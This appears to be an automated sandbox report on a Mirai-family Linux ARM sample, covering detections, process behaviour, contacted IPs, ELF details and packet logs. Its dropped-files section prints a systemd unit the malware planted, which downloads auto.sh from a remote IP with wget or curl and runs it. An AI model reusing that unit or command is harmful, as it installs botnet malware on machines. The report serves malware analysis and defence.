Source: arm.elf, 5822.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmp, arm.elf, 6005.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmp, arm.elf, 6007.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmp, arm.elf, 6013.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmp, arm.elf, 6021.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmp, arm.elf, 6023.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmp, arm.elf, 6029.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmp, arm.elf, 6037.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmp, arm.elf, 6039.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmp, arm.elf, 6084.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmp, arm.elf, 6086.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmp, arm.elf, 6114.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmp, arm.elf, 6115.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmp, arm.elf, 6126.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmp, arm.elf, 6128.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmp, arm.elf, 6137.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmp, arm.elf, 6140.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmp, arm.elf, 6169.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/arm.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm.elf
Source: arm.elf, 6276.1.00005618be34f000.00005618be49e000.rw-.sdmpBinary or memory string: V/arm/var/lib/vmwareA
Source: arm.elf, 5822.1.00005618be34f000.00005618be49e000.rw-.sdmp, arm.elf, 6005.1.00005618be34f000.00005618be49e000.rw-.sdmp, arm.elf, 6007.1.00005618be34f000.00005618be49e000.rw-.sdmp, arm.elf, 6013.1.00005618be34f000.00005618be49e000.rw-.sdmp, arm.elf, 6021.1.00005618be34f000.00005618be49e000.rw-.sdmp, arm.elf, 6023.1.00005618be34f000.00005618be49e000.rw-.sdmp, arm.elf, 6029.1.00005618be34f000.00005618be49e000.rw-.sdmp, arm.elf, 6037.1.00005618be34f000.00005618be49e000.rw-.sdmp, arm.elf, 6039.1.00005618be34f000.00005618be49e000.rw-.sdmp, arm.elf, 6084.1.00005618be34f000.00005618be49e000.rw-.sdmp, arm.elf, 6086.1.00005618be34f000.00005618be49e000.rw-.sdmp, arm.elf, 6114.1.00005618be34f000.00005618be49e000.rw-.sdmp, arm.elf, 6115.1.00005618be34f000.00005618be49e000.rw-.sdmp, arm.elf, 6126.1.00005618be34f000.00005618be49e000.rw-.sdmp, arm.elf, 6128.1.00005618be34f000.00005618be49e000.rw-.sdmp, arm.elf, 6137.1.00005618be34f000.00005618be49e000.rw-.sdmp, arm.elf, 6140.1.00005618be34f000.00005618be49e000.rw-.sdmp, arm.elf, 6169.1.00005618be34f000.00005618be49e000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: arm.elf, 6276.1.00007f645c045000.00007f645c251000.rw-.sdmpBinary or memory string: /var/lib/vmware/VGAuth
Source: arm.elf, 5822.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmp, arm.elf, 6005.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmp, arm.elf, 6007.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmp, arm.elf, 6013.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmp, arm.elf, 6021.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmp, arm.elf, 6023.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmp, arm.elf, 6029.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmp, arm.elf, 6037.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmp, arm.elf, 6039.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmp, arm.elf, 6084.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmp, arm.elf, 6086.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmp, arm.elf, 6114.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmp, arm.elf, 6115.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmp, arm.elf, 6126.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmp, arm.elf, 6128.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmp, arm.elf, 6137.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmp, arm.elf, 6140.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmp, arm.elf, 6169.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: arm.elf, 5822.1.00005618be34f000.00005618be49e000.rw-.sdmp, arm.elf, 6005.1.00005618be34f000.00005618be49e000.rw-.sdmp, arm.elf, 6007.1.00005618be34f000.00005618be49e000.rw-.sdmp, arm.elf, 6013.1.00005618be34f000.00005618be49e000.rw-.sdmp, arm.elf, 6021.1.00005618be34f000.00005618be49e000.rw-.sdmp, arm.elf, 6023.1.00005618be34f000.00005618be49e000.rw-.sdmp, arm.elf, 6029.1.00005618be34f000.00005618be49e000.rw-.sdmp, arm.elf, 6037.1.00005618be34f000.00005618be49e000.rw-.sdmp, arm.elf, 6039.1.00005618be34f000.00005618be49e000.rw-.sdmp, arm.elf, 6084.1.00005618be34f000.00005618be49e000.rw-.sdmp, arm.elf, 6086.1.00005618be34f000.00005618be49e000.rw-.sdmp, arm.elf, 6114.1.00005618be34f000.00005618be49e000.rw-.sdmp, arm.elf, 6115.1.00005618be34f000.00005618be49e000.rw-.sdmp, arm.elf, 6126.1.00005618be34f000.00005618be49e000.rw-.sdmp, arm.elf, 6128.1.00005618be34f000.00005618be49e000.rw-.sdmp, arm.elf, 6137.1.00005618be34f000.00005618be49e000.rw-.sdmp, arm.elf, 6140.1.00005618be34f000.00005618be49e000.rw-.sdmp, arm.elf, 6169.1.00005618be34f000.00005618be49e000.rw-.sdmpBinary or memory string: V!/etc/qemu-binfmt/arm
Source: arm.elf, 6276.1.00005618be34f000.00005618be49e000.rw-.sdmpBinary or memory string: V/arm/var/lib/vmware/VGAuth/aliasStoreP /var/lib/PackageKitQ`
Source: arm.elf, 6276.1.00007f645c034000.00007f645c045000.rw-.sdmpBinary or memory string: $/tmp/vmware-root_724-2965906890
Source: arm.elf, 6276.1.00007f645c034000.00007f645c045000.rw-.sdmpBinary or memory string: `/tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-systemd-timedated.service-yXFFHg/tmpP/tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-fwupd.service-uNmslg4/tmp/vmware-root_724-29659068904tV
Source: arm.elf, 6276.1.00007f645c045000.00007f645c251000.rw-.sdmpBinary or memory string: /var/lib/vmware/VGAuth4/var/lib/NetworkManagerxM

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting		Valid AccountsWindows Management Instrumentation1
Systemd Service		1
Systemd Service		1
Hidden Files and Directories		1
OS Credential Dumping		11
Security Software Discovery		Remote ServicesData from Local System1
Non-Standard Port		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job2
Scripting		Boot or Logon Initialization Scripts1
Indicator Removal		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
File Deletion		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1585020 Sample: arm.elf Startdate: 07/01/2025 Architecture: LINUX Score: 72 43 tcpdown.suo. [malformed] 2->43 45 107.175.130.16, 44026, 44028, 44030 AS-COLOCROSSINGUS United States 2->45 47 3 other IPs or domains 2->47 49 Antivirus / Scanner detection for submitted sample 2->49 51 Multi AV Scanner detection for submitted file 2->51 9 arm.elf 2->9         started        12 gnome-session-binary sh gsd-rfkill 2->12         started        14 systemd snapd-env-generator 2->14         started        16 5 other processes 2->16 signatures3 53 Sends malformed DNS queries 43->53 process4 signatures5 59 Sample deletes itself 9->59 18 arm.elf 9->18         started        process6 process7 20 arm.elf 18->20         started        23 arm.elf sh 18->23         started        25 arm.elf sh 18->25         started        27 arm.elf 18->27         started        signatures8 55 Manipulation of devices in /dev 20->55 57 Deletes system log files 20->57 29 arm.elf 20->29         started        31 arm.elf 20->31         started        33 arm.elf 20->33         started        41 44 other processes 20->41 35 sh systemctl 23->35         started        37 sh systemctl 25->37         started        39 arm.elf 27->39         started        process9

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
arm.elf55%ReversingLabsLinux.Trojan.Mirai
arm.elf100%AviraEXP/ELF.Mirai.W

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://154.216.20.138/auto.sh;0%Avira URL Cloudsafe
http://154.216.20.138/auto.sh0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
tcpdown.su
45.200.149.96
truefalse
    		high
    tcpdown.su|1
    		unknown
    		unknownfalse
      		unknown
      tcpdown.suo. [malformed]
      		unknown
      		unknowntrue
        		unknown
        tcpdown.su
        		unknown
        		unknownfalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://154.216.20.138/auto.sh;arm.elf, startup_command.service.13.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://154.216.20.138/auto.shstartup_command.service.13.drfalse
          • Avira URL Cloud: safe
          		unknown

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          107.175.130.16
          		unknownUnited States
          		36352AS-COLOCROSSINGUSfalse
          23.94.242.130
          		unknownUnited States
          		36352AS-COLOCROSSINGUSfalse

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          107.175.130.16sparc.elfGet hashmaliciousUnknownBrowse
            m68k.elfGet hashmaliciousUnknownBrowse
              i686.elfGet hashmaliciousUnknownBrowse
                i586.elfGet hashmaliciousUnknownBrowse
                  sh4.elfGet hashmaliciousUnknownBrowse
                    powerpc.elfGet hashmaliciousUnknownBrowse
                      i586.elfGet hashmaliciousUnknownBrowse
                        m68k.elfGet hashmaliciousUnknownBrowse
                          sparc.elfGet hashmaliciousUnknownBrowse
                            i686.elfGet hashmaliciousUnknownBrowse
                              23.94.242.130sparc.elfGet hashmaliciousUnknownBrowse
                                powerpc.elfGet hashmaliciousUnknownBrowse
                                  sparc.elfGet hashmaliciousUnknownBrowse
                                    x86_64.elfGet hashmaliciousUnknownBrowse
                                      mips.elfGet hashmaliciousUnknownBrowse
                                        mpsl.elfGet hashmaliciousUnknownBrowse
                                          mpsl.elfGet hashmaliciousUnknownBrowse
                                            mips.elfGet hashmaliciousUnknownBrowse

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              tcpdown.susparc.elfGet hashmaliciousUnknownBrowse
                                              • 45.200.149.95
                                              sparc.elfGet hashmaliciousUnknownBrowse
                                              • 45.200.149.95

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              AS-COLOCROSSINGUSsparc.elfGet hashmaliciousUnknownBrowse
                                              • 23.94.242.130
                                              m68k.elfGet hashmaliciousUnknownBrowse
                                              • 107.175.130.16
                                              i686.elfGet hashmaliciousUnknownBrowse
                                              • 107.175.130.16
                                              i586.elfGet hashmaliciousUnknownBrowse
                                              • 107.175.130.16
                                              momo.mips.elfGet hashmaliciousMiraiBrowse
                                              • 23.94.40.4
                                              bash.elfGet hashmaliciousUnknownBrowse
                                              • 107.173.129.144
                                              cats.elfGet hashmaliciousConnectBackBrowse
                                              • 107.173.129.144
                                              DEMONS.sh4.elfGet hashmaliciousUnknownBrowse
                                              • 172.245.26.218
                                              sh4.elfGet hashmaliciousUnknownBrowse
                                              • 23.94.37.42
                                              powerpc.elfGet hashmaliciousUnknownBrowse
                                              • 104.168.33.8
                                              AS-COLOCROSSINGUSsparc.elfGet hashmaliciousUnknownBrowse
                                              • 23.94.242.130
                                              m68k.elfGet hashmaliciousUnknownBrowse
                                              • 107.175.130.16
                                              i686.elfGet hashmaliciousUnknownBrowse
                                              • 107.175.130.16
                                              i586.elfGet hashmaliciousUnknownBrowse
                                              • 107.175.130.16
                                              momo.mips.elfGet hashmaliciousMiraiBrowse
                                              • 23.94.40.4
                                              bash.elfGet hashmaliciousUnknownBrowse
                                              • 107.173.129.144
                                              cats.elfGet hashmaliciousConnectBackBrowse
                                              • 107.173.129.144
                                              DEMONS.sh4.elfGet hashmaliciousUnknownBrowse
                                              • 172.245.26.218
                                              sh4.elfGet hashmaliciousUnknownBrowse
                                              • 23.94.37.42
                                              powerpc.elfGet hashmaliciousUnknownBrowse
                                              • 104.168.33.8

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              /etc/systemd/system/startup_command.service

                                              Download File
                                              Process:/tmp/arm.elf
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):361
                                              Entropy (8bit):5.16738909970438
                                              Encrypted:false
                                              SSDEEP:6:z8jvIERZAMzdK+KOnFfltZCrXbcCmBNcCm4RcCmO/Ls7QkhILQmWA4Rv:z+vIERZAOK+PCrXIpiQuj73GLHWrv
                                              MD5:AF7D62B73266E0B457B114FE91F7E926
                                              SHA1:11261AEF4573B56B67B32020049C69C7282FC212
                                              SHA-256:14CB525E5A6B8AAF20C38672F8A9F974A684990888214848818326A739906642
                                              SHA-512:3926FBB53496C3AAA34CC782BD5C8379E0AB94B11FE4E63BBBFEAC4E2B5057369C94BBE25AC56C3F04363076C91B978F9199FED97C5ED8377A6DC852B01EBFD9
                                              Malicious:false
                                              Reputation:low
                                              Preview:[Unit].Description=Startup Command.After=network.target..[Service].ExecStart=cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.20.138/auto.sh || busybox wget http://154.216.20.138/auto.sh || curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh (null).RemainAfterExit=yes..[Install].WantedBy=multi-user.target.

                                              /memfd:snapd-env-generator (deleted)

                                              Download File
                                              Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):76
                                              Entropy (8bit):3.7627880354948586
                                              Encrypted:false
                                              SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                              MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                              SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                              SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                              SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

                                              /tmp/qemu-open.CjSZ5o (deleted)

                                              Download File
                                              Process:/tmp/arm.elf
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):13
                                              Entropy (8bit):3.3927474104487847
                                              Encrypted:false
                                              SSDEEP:3:Tg7G:Tgy
                                              MD5:060C950602AE5DFAF583473721C0D328
                                              SHA1:91D13B439729088DC17F1E0519970D82C56F2B07
                                              SHA-256:F8D4586FDF6230A2D5F431EF44BABDF37F6D7CEDBB3560702B0DC8493DD44EE3
                                              SHA-512:000D50E0A5736B0AB3B1BF61F55911914808FA197365B10F61F24096E2959ADAC2C3FF0D9ED226AD99934093F9FDD1C7035A22EEB5091DF75402A0A26E7A84AC
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:/tmp/arm.elf.

                                              Static File Info

                                              General

                                              File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
                                              Entropy (8bit):5.915014488543179
                                              TrID:
                                              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                              File name:arm.elf
                                              File size:84'632 bytes
                                              MD5:e4c06f131d9c9081859ab1071b6fa221
                                              SHA1:b08a82702d62782a9d64b8b5607300ac513c6992
                                              SHA256:bde1f436368a6eb6cc655643b4a463d4e83e064db00ce12a48d9d3ee6a2ffc99
                                              SHA512:cd1c52ad973e598556969f46455655e00eaba09464c1cff703b56a7a8a6e47793bee62770228b4e5950766b726baa54c5fb0b49e7a35256d8bc1ac7a864b0f9d
                                              SSDEEP:1536:boViXgeg8lbip2Mq/UrMFswJflvwT7F/LEHRn7r6sSHv44:boV/KH1WwJtYT7RLEJfe44
                                              TLSH:F1833991BC815613C5C5127BFB6E428D372A23A8D3EF3207DD266F21378692B0E77246
                                              File Content Preview:.ELF...a..........(.........4....I......4. ...(......................E...E...............E...E...E..................Q.td..................................-...L."...gF..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                                              Static ELF Info

                                              ELF header

                                              Class:ELF32
                                              Data:2's complement, little endian
                                              Version:1 (current)
                                              Machine:ARM
                                              Version Number:0x1
                                              Type:EXEC (Executable file)
                                              OS/ABI:ARM - ABI
                                              ABI Version:0
                                              Entry Point Address:0x8190
                                              Flags:0x202
                                              ELF Header Size:52
                                              Program Header Offset:52
                                              Program Header Size:32
                                              Number of Program Headers:3
                                              Section Header Offset:84232
                                              Section Header Size:40
                                              Number of Section Headers:10
                                              Header String Table Index:9

                                              Sections

                                              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                              NULL0x00x00x00x00x0000
                                              .initPROGBITS0x80940x940x180x00x6AX004
                                              .textPROGBITS0x80b00xb00x119d40x00x6AX0016
                                              .finiPROGBITS0x19a840x11a840x140x00x6AX004
                                              .rodataPROGBITS0x19a980x11a980x2a6c0x00x2A004
                                              .ctorsPROGBITS0x245080x145080x80x00x3WA004
                                              .dtorsPROGBITS0x245100x145100x80x00x3WA004
                                              .dataPROGBITS0x2451c0x1451c0x3ac0x00x3WA004
                                              .bssNOBITS0x248c80x148c80xe7140x00x3WA004
                                              .shstrtabSTRTAB0x00x148c80x3e0x00x0001

                                              Program Segments

                                              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                              LOAD0x00x80000x80000x145040x145045.94370x5R E0x8000.init .text .fini .rodata
                                              LOAD0x145080x245080x245080x3c00xead42.78460x6RW 0x8000.ctors .dtors .data .bss
                                              GNU_STACK0x00x00x00x00x00.00000x7RWE0x4

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 7, 2025 00:49:20.298429012 CET381962601192.168.2.1523.94.242.130
                                              Jan 7, 2025 00:49:20.303272963 CET26013819623.94.242.130192.168.2.15
                                              Jan 7, 2025 00:49:20.303354979 CET381962601192.168.2.1523.94.242.130
                                              Jan 7, 2025 00:49:20.306390047 CET381962601192.168.2.1523.94.242.130
                                              Jan 7, 2025 00:49:20.311119080 CET26013819623.94.242.130192.168.2.15
                                              Jan 7, 2025 00:49:20.311157942 CET381962601192.168.2.1523.94.242.130
                                              Jan 7, 2025 00:49:20.315951109 CET26013819623.94.242.130192.168.2.15
                                              Jan 7, 2025 00:49:20.954230070 CET26013819623.94.242.130192.168.2.15
                                              Jan 7, 2025 00:49:20.954484940 CET381962601192.168.2.1523.94.242.130
                                              Jan 7, 2025 00:49:20.954484940 CET381962601192.168.2.1523.94.242.130
                                              Jan 7, 2025 00:49:25.317243099 CET440267722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:25.322061062 CET772244026107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:25.322170019 CET440267722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:25.324166059 CET440267722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:25.324166059 CET440267722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:25.328927040 CET772244026107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:25.334681988 CET440287722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:25.339468956 CET772244028107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:25.340097904 CET440287722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:25.375766039 CET772244026107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:25.401616096 CET440287722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:25.401616096 CET440287722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:25.407140970 CET772244028107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:25.450793028 CET772244028107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:25.611455917 CET440307722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:25.616334915 CET772244030107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:25.616410017 CET440307722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:25.621458054 CET440307722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:25.621769905 CET440307722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:25.626183033 CET772244030107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:25.666750908 CET772244030107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:25.690288067 CET772244026107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:25.690397978 CET440267722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:25.727853060 CET772244028107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:25.727996111 CET440287722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:26.007669926 CET772244030107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:26.007771015 CET440307722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:27.186788082 CET440327722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:27.191673994 CET772244032107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:27.191766977 CET440327722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:27.194051027 CET440347722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:27.195703030 CET440327722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:27.195703030 CET440327722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:27.198796988 CET772244034107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:27.200541973 CET772244032107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:27.204293966 CET440347722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:27.233859062 CET440347722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:27.233952999 CET440347722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:27.238749027 CET772244034107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:27.242774010 CET772244032107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:27.282809973 CET772244034107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:27.473781109 CET440367722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:27.478807926 CET772244036107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:27.478868008 CET440367722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:27.481717110 CET440367722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:27.481798887 CET440367722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:27.486521006 CET772244036107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:27.526777983 CET772244036107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:27.580230951 CET772244032107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:27.580298901 CET440327722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:27.584527969 CET772244034107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:27.584588051 CET440347722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:27.854850054 CET772244036107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:27.854909897 CET440367722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:32.212325096 CET440387722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:32.217335939 CET772244038107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:32.217395067 CET440387722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:32.219228983 CET440387722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:32.219300032 CET440387722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:32.224005938 CET772244038107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:32.239847898 CET440407722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:32.244749069 CET772244040107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:32.244831085 CET440407722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:32.266841888 CET772244038107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:32.313591957 CET440407722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:32.313627005 CET440407722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:32.318485975 CET772244040107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:32.358798981 CET772244040107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:32.581935883 CET772244038107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:32.582035065 CET440387722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:32.637438059 CET772244040107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:32.640007019 CET440407722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:37.248425961 CET440427722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:37.251885891 CET440447722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:37.253314972 CET772244042107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:37.253371000 CET440427722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:37.254120111 CET440427722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:37.254190922 CET440427722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:37.256679058 CET772244044107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:37.258991957 CET772244042107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:37.263183117 CET440447722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:37.273471117 CET440447722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:37.273561001 CET440447722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:37.278227091 CET772244044107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:37.306818962 CET772244042107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:37.322766066 CET772244044107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:37.621992111 CET772244042107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:37.622085094 CET440427722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:37.644067049 CET772244044107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:37.644140005 CET440447722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:42.351227999 CET440467722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:42.353411913 CET440487722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:42.356298923 CET772244046107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:42.356379032 CET440467722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:42.357111931 CET440467722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:42.357198000 CET440467722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:42.358331919 CET772244048107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:42.358417988 CET440487722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:42.361906052 CET772244046107.175.130.16192.168.2.15
                                              Jan 7, 2025 00:49:42.372092009 CET440487722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:42.372165918 CET440487722192.168.2.15107.175.130.16
                                              Jan 7, 2025 00:49:42.376972914 CET772244048107.175.130.16192.168.2.15
